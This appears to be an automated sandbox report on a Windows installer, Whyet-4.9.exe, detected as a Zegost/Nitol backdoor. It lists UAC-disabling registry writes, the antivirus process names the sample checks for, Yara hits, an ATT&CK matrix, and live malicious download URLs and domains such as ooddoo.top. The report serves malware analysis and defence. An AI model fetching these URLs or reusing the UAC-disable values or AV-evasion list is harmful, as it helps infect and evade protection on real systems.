Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Code function: 0_2_00007FF676FA4D20 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00007FF676FA4D20

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_00000001800347B0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00000001800347B0

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Code function: 0_2_00007FF676FA4260 HeapCreate,GetVersion,HeapSetInformation,

0_2_00007FF676FA4260

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to modify Windows User Account Control (UAC) settings

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop

32_2_04D71B6D

Disable UAC(promptonsecuredesktop)

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4c30607.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.616e5ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d70000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.iusb3mon.exe.4d305bf.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	2 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Native API	1 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	121 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	4 Windows Service	1 Bypass User Account Control	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	4 Windows Service	1 Bypass User Account Control	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	21 Process Injection	13 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	251 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Indicator Removal	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Whyet-4.9.exe	12%	Virustotal		Browse
Whyet-4.9.exe	13%	ReversingLabs	Win32.Backdoor.Zegost

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\ProgramData\Program\iusb3mon.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	100%	Joe Sandbox ML
C:\ProgramData\Program\iusb3mon.exe	100%	Joe Sandbox ML
C:\Program Files\product1\letsvpn-latest.exe	3%	ReversingLabs
C:\ProgramData\Microsoft\Program\ziliao.jpg	13%	ReversingLabs	Win32.Dropper.Generic
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ooddoo.top	104.21.81.224	true	true
huazai168.com	118.107.45.13	true	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ooddoo.top/abc/40.exe	true
http://ooddoo.top/abc/40.exe	true

URLs from Memory and Binaries

Name	Source	Malicious
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.2219260408.0000020BCE77C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2193866878.0000020BC00CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2219260408.0000020BCE8B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2520449271.0000000005868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2507699467.000000000603F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2512297555.0000000005CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	false
https://sectigo.com/CPS0	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	false
http://%s/ip.txtMozilla/4.0	irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 0000000C.00000002.2193330728.0000020BBCC75000.00000004.00000020.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	false
http://www.360.cn.	Whyet-4.9.exe, 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmp	false
http://www.yourcompany.com	irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
https://ooddoo.top/abc/	irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000021.00000002.4100661599.000002BE36400000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000021.00000003.2440278244.000002BE361E0000.00000004.00000800.00020000.00000000.sdmp	false
http://www.microsoft.	powershell.exe, 00000012.00000002.2548483798.0000000006E08000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
http://nsis.sf.net/NSIS_ErrorError	irsetup.exe, 00000002.00000003.2086852126.0000000006160000.00000004.00000020.00020000.00000000.sdmp	false
http://ooddoo.top/abc/	irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.00000000032D0000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	false
http://www.indigorose.com/route.php?pid=suf9buy	Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4547332364.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2059096006.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.2447234103.0000000005396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2554221702.0000000007B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2586009006.000000000057A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2803843723.000000000796E000.00000004.00000020.00020000.00000000.sdmp	false
http://www.indigorose.com	Whyet-4.9.exe, 00000000.00000002.2192685995.00000000029A0000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 00000021.00000003.2440278244.000002BE36253000.00000004.00000800.00020000.00000000.sdmp	false
https://ooddoo.top/abc/40.exec/40.exe	irsetup.exe, 00000002.00000002.4545979900.00000000063CA000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2393803360.00000000063D8000.00000004.00000020.00020000.00000000.sdmp	false
